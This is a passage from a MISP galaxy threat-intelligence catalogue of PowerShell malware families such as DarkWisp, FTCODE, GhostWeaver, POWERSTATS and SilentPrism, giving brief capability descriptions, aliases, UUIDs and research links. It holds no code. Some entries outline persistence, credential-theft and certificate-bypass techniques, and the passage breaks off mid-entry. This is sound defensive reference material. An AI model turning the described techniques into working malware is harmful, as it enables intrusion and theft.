- https://www.cloudflare.com/threat-intelligence/research/report/disrupting-flyingyetis-campaign-targeting-ukrainev/ - webarchive
- https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/ - webarchive
- https://cert.gov.ua/article/6278620 - webarchive
- https://cert.gov.ua/article/6277849 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarkWisp
According to Trend Micro, DarkWisp is a PowerShell-based backdoor and reconnaissance utility designed for unauthorized system access and intelligence gathering. It enables attackers to exfiltrate sensitive data while maintaining persistent control over the compromised system. The malware collects extensive information about the compromised system to create a detailed profile. It determines whether the user has administrative privileges, checks for membership in a corporate domain, and identifies the presence of cryptocurrency wallets or VPN software by scanning specified directories and applications. It also gathers data about the system's operating environment, including public IP address, geographic location, installed antivirus products, firewall status, and system uptime. This information is compiled into a structured format and transmitted to the C&C server.
Internal MISP references
UUID 66f938aa-68b2-4ba4-b44b-a9dde74aca93 which can be used as unique global reference for DarkWisp in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EugenLoader
A loader written in PowerShell, usually delivered packaged in MSI/MSIX files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EugenLoader.
| Known Synonyms |
|---|
| FakeBat |
| NUMOZYLOD |
| PaykLoader |
Internal MISP references
UUID cf9c14cf-6246-4858-8bcc-5a943c8df715 which can be used as unique global reference for EugenLoader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.eugenloader - webarchive
- https://esentire-dot-com-assets.s3.amazonaws.com/assets/resourcefiles/eSentire-Unraveling_BatLoader_and_FakeBat.pdf - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://intel471.com/blog/malvertising-surges-to-distribute-malware - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/11/TLP-CLEAR-PROSPERO-Proton66-Uncovering-the-links-between-bulletproof-networks.pdf - webarchive
- https://www.intrinsec.com/prospero-proton66-tracing-uncovering-the-links-between-bulletproof-networks/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-NUMOZYLOD-with-Google-Security/ba-p/789551 - webarchive
- https://www.recordedfuture.com/research/grayalpha-uses-diverse-infection-vectors-deploy-powernet-loader-netsupport-rat - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlowerPower
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlowerPower.
| Known Synonyms |
|---|
| BoBoStealer |
Internal MISP references
UUID 6f0f034a-13f1-432d-bc70-f78d7f27f46f which can be used as unique global reference for FlowerPower in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf - webarchive
- https://www.genians.co.kr/en/blog/threat_intelligence/triple-combo - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://vblocalhost.com/uploads/VB2020-46.pdf - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FRat Loader
Loader used to deliver FRat (see family windows.frat).
Internal MISP references
UUID 385a3dca-263d-46be-b84d-5dc09ee466d9 which can be used as unique global reference for FRat Loader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FTCODE
FTCODE is a ransomware which encrypts files and changes their extension to .FTCODE. It then asks for a ransom in exchange for the decryption key, which is required to recover the files. It is infamous for attacking Italy while pretending to be a notorious telecom provider asking for due payments.
Internal MISP references
UUID f727a05e-c1cd-4e95-b0bf-2a4bb64aa850 which can be used as unique global reference for FTCODE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode - webarchive
- https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/ - webarchive
- https://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/ - webarchive
- https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html - webarchive
- https://www.certego.net/en/news/malware-tales-ftcode/ - webarchive
- https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/ - webarchive
- https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities - webarchive
- https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122 - webarchive
- https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GhostMiner
Internal MISP references
UUID 0db05333-2214-49c3-b469-927788932aaa which can be used as unique global reference for GhostMiner in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GhostWeaver
According to TRAC Labs, the GhostWeaver backdoor not only maintains continuous, authenticated communication with its command-and-control server but also includes functionalities to generate DGA domains (using a fixed-seed algorithm based on the week number and year), deliver additional payloads via remote commands and bypass certificate validation by leveraging a RemoteCertificateValidationCallback that always returns true. Multiple delivered plugins are designed to target sensitive information - including credentials from popular browsers (Brave, Chrome, Firefox, Edge), Outlook data, and cryptocurrency wallets. The Formgrabber plugin includes web injection methods by dynamically manipulating HTML content, modifying JA3 fingerprints via cipher suite reordering, and employing a man-in-the-middle proxy setup to intercept the traffic. GhostWeaver’s and plugins’ delivery on systems that are not part of an Active Directory domain suggests that attackers are extending their reach beyond typical corporate targets, aligning with a financially motivated agenda that exploits environments with weaker security controls.
Internal MISP references
UUID 8a3af7b5-6039-42ac-bd14-6d6b21e0e2ae which can be used as unique global reference for GhostWeaver in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HTTP-Shell
The author describes this open source shell as follows. HTTP-Shell is a multiplatform reverse shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection, movement between directories and supports sudo (or sudo su) on Linux-based OS.
Internal MISP references
UUID 50b94b67-dc2a-4953-a354-edf2cc4e17d3 which can be used as unique global reference for HTTP-Shell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JasperLoader
Internal MISP references
UUID 286a14a1-7113-4bed-97ce-8db41b312a51 which can be used as unique global reference for JasperLoader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader - webarchive
- https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html - webarchive
- https://blog.threatstop.com/upgraded-jasperloader-infecting-machines - webarchive
- https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html - webarchive
- https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kalambur
According to EclecticIQ, Kalambur is designed to gather local system information, then download a repackaged TOR binary inside a ZIP file and retrieve additional tools from what is likely an attacker-controlled TOR onion site.
Internal MISP references
UUID 5823aa92-75d1-4fdc-adcb-ff6a4918b226 which can be used as unique global reference for Kalambur in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lazyscripter
Internal MISP references
UUID 74e5711e-b777-4f09-a4bc-db58d5e23e29 which can be used as unique global reference for Lazyscripter in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LightBot
According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.
Internal MISP references
UUID 319c4b4f-2901-412c-8fa5-70be75ba51cb which can be used as unique global reference for LightBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Octopus (Powershell)
The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."
It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.
Internal MISP references
UUID c3ca7a89-a885-444a-8642-31019b34b027 which can be used as unique global reference for Octopus (Powershell) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus - webarchive
- https://github.com/mhaskar/Octopus - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf - webarchive
- https://isc.sans.edu/diary/26918 - webarchive
- https://isc.sans.edu/diary/rss/28628 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OilRig
Internal MISP references
UUID 4a3b9669-8f91-47df-a8bf-a9876ab8edf3 which can be used as unique global reference for OilRig in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig - webarchive
- https://threatpost.com/oilrig-apt-unique-backdoor/157646/ - webarchive
- https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html - webarchive
- https://twitter.com/MJDutch/status/1074820959784321026?s=19 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PhonyC2
Internal MISP references
UUID c630e510-a0ad-405a-9aeb-9d8057b6a868 which can be used as unique global reference for PhonyC2 in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.phonyc2 - webarchive
- https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel - webarchive
- https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater - webarchive
- https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps - webarchive
- https://circleid.com/posts/20230824-signs-of-muddywater-developments-found-in-the-dns - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POSHSPY
Internal MISP references
UUID 4df1b257-c242-46b0-b120-591430066b6f which can be used as unique global reference for POSHSPY in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerBrace
Internal MISP references
UUID 7b334343-0045-4d65-b28a-ebf912c7aafc which can be used as unique global reference for PowerBrace in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerHarbor
PowerHarbor is a modular PowerShell-based malware. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.
Internal MISP references
UUID 73b40a4c-9163-4a07-bf1b-e4a4344ac63a which can be used as unique global reference for PowerHarbor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerNet
According to Insikt Group, PowerNet is a custom Powershell loader that decompresses and executes NetSupport RAT.
Internal MISP references
UUID f43dee27-8484-4d4e-a981-2fa9c8a31010 which can be used as unique global reference for PowerNet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerPepper
Internal MISP references
UUID 6544c75b-809f-4d31-a235-8906d4004828 which can be used as unique global reference for PowerPepper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERPIPE
Internal MISP references
UUID 60d7f668-66b6-401b-976f-918470a23c3d which can be used as unique global reference for POWERPIPE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERPLANT
POWERPLANT is a PowerShell-based backdoor used by FIN7. According to Mandiant, it was revealed to be a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."
Internal MISP references
UUID 697626d3-04a1-4426-aeae-d7054c6e78fb which can be used as unique global reference for POWERPLANT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
powershell_web_backdoor
Internal MISP references
UUID 4310dcab-0820-4bc1-8a0b-9691c20f5b49 which can be used as unique global reference for powershell_web_backdoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerShortShell
Internal MISP references
UUID f2198153-2d8b-49ed-b8a8-0952c289b8c0 which can be used as unique global reference for PowerShortShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerShower
Internal MISP references
UUID 0959a02e-6eba-43dc-bbbf-b2c7488e9371 which can be used as unique global reference for PowerShower in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa/ - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016 - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/ - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
- https://attack.mitre.org/groups/G0100/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERSOURCE
POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.
Internal MISP references
UUID a4584181-f739-43d1-ade9-8a7aa21278a0 which can be used as unique global reference for POWERSOURCE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html - webarchive
- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerSpritz
Internal MISP references
UUID c07f6484-0669-44b7-90e6-f642e316d277 which can be used as unique global reference for PowerSpritz in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERSTAR
Internal MISP references
UUID 60e11a7b-8452-4177-b709-99ef0976c296 which can be used as unique global reference for POWERSTAR in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERSTATS
POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POWERSTATS.
| Known Synonyms |
|---|
| Valyria |
Internal MISP references
UUID b81d91b5-23a4-4f86-aea9-3f212169fce9 which can be used as unique global reference for POWERSTATS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats - webarchive
- https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/ - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ - webarchive
- https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA - webarchive
- https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/ - webarchive
- http://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html - webarchive
- https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/ - webarchive
- https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater - webarchive
- https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/ - webarchive
- https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/ - webarchive
- https://blog.prevailion.com/2020/01/summer-mirage.html - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
- https://www.group-ib.com/blog/muddywater/ - webarchive
- https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-055a - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html - webarchive
- https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/ - webarchive
- https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/boggyserpens/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERTON
Internal MISP references
UUID 08d5b8a4-e752-48f3-ac6d-944807146ce7 which can be used as unique global reference for POWERTON in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton - webarchive
- https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - webarchive
- https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/ - webarchive
- https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://norfolkinfosec.com/apt33-powershell-malware/ - webarchive
- https://www.symantec.com/security-center/writeup/2019-062513-4935-99 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWERTRASH
This PowerShell-based malware is an in-memory dropper used by FIN7 to execute its embedded payload. According to Mandiant's blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."
Internal MISP references
UUID ff20d720-285e-4168-ac8c-86a7f9ac18d4 which can be used as unique global reference for POWERTRASH in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powertrash - webarchive
- https://www.recordedfuture.com/research/grayalpha-uses-diverse-infection-vectors-deploy-powernet-loader-netsupport-rat - webarchive
- https://www.mandiant.com/resources/blog/evolution-of-fin7 - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerWare
Internal MISP references
UUID 5c5beab9-614c-4c86-b369-086234ddb43c which can be used as unique global reference for PowerWare in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerZure
PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.
Internal MISP references
UUID f5fa77e9-9851-48a6-864d-e0448de062d4 which can be used as unique global reference for PowerZure in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerMagic
Internal MISP references
UUID 7ee51054-1d3b-45ec-a7fd-1e212c891b99 which can be used as unique global reference for PowerMagic in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger - webarchive
- https://securelist.com/cloudwizard-apt/109722/ - webarchive
- https://securelist.com/bad-magic-apt/109087/?s=31 - webarchive
- https://securelist.com/bad-magic-apt/109087/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowerRAT
Internal MISP references
UUID 970bdeaf-bc34-458a-ae67-8c3578e8663d which can be used as unique global reference for PowerRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PowGoop
DLL loader that decrypts and runs a powershell-based downloader.
Internal MISP references
UUID d8429f6d-dc4b-4aae-930d-234156dbf354 which can be used as unique global reference for PowGoop in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop - webarchive
- https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ - webarchive
- https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east - webarchive
- https://unit42.paloaltonetworks.com/thanos-ransomware/ - webarchive
- https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/ - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-055a - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POWRUNER
Internal MISP references
UUID 63f6df51-4de3-495a-864f-0a7e30c3b419 which can be used as unique global reference for POWRUNER in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner - webarchive
- https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2 - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PresFox
The family adds a fake root certificate authority, sets a proxy.pac URL for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on the information shared, it seems the PowerShell script is dropped by an exploit kit.
Internal MISP references
UUID c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8 which can be used as unique global reference for PresFox in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PteroGraphin
Internal MISP references
UUID 83625464-dcb9-481d-8ced-d46c41b6d098 which can be used as unique global reference for PteroGraphin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QUADAGENT
Internal MISP references
UUID e27bfd65-4a58-416a-b03a-1ab1703edb24 which can be used as unique global reference for QUADAGENT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent - webarchive
- https://youtu.be/pBDu8EGWRC4?t=2492 - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RandomQuery (Powershell)
A set of powershell scripts, using services like Google Docs and Dropbox as C2.
Internal MISP references
UUID b0a67107-dff2-4fb9-a47e-10f83779bdbb which can be used as unique global reference for RandomQuery (Powershell) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.randomquery - webarchive
- https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/ - webarchive
- https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/ - webarchive
- https://s2w.inc/en/resource/detail/920 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RMOT
According to Trellix, this is a first-stage, powershell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.
Internal MISP references
UUID 7e79444b-95d9-422d-92f0-aeb833a7cbcd which can be used as unique global reference for RMOT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RogueRobin
Internal MISP references
UUID 1e27a569-1899-4f6f-8c42-aa91bf0a539d which can be used as unique global reference for RogueRobin in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/ - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca - webarchive
- https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Royal Ransom (Powershell)
Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.
Internal MISP references
UUID 1c75ffff-59f9-4fdc-958d-51f822f76c35 which can be used as unique global reference for Royal Ransom (Powershell) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Schtasks
Internal MISP references
UUID 3c627182-e4ee-4db0-9263-9d657a5d7c98 which can be used as unique global reference for Schtasks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SilentPrism
According to Trend Micro, SilentPrism is a backdoor malware designed to achieve persistence, dynamically execute shell commands, and maintain unauthorized remote control of compromised systems. It implements persistence mechanisms differently based on user privileges: for non-administrative users, it leverages the Windows registry to create auto-run entries using mshta.exe combined with VBScript to download and execute remote payloads; for administrative users, it deploys scheduled tasks with similar execution methods. SilentPrism retrieves additional payloads and instructions from a C&C server, ensuring modular functionality. The malware communicates with its C&C server using encrypted channels, employing AES encryption and Base64 encoding to obfuscate data. Commands received are decrypted and executed in various ways, including direct PowerShell script execution, dynamic script block creation, or job-based execution. Each task is tracked using unique identifiers, allowing the malware to monitor execution states and return results to the server. SilentPrism incorporates anti-analysis techniques such as virtual machine detection and randomized sleep intervals (ranging from 300 to 700 milliseconds) between operations, making its behavior less predictable. Additionally, it continuously polls the C&C server for commands, enabling operators to dynamically 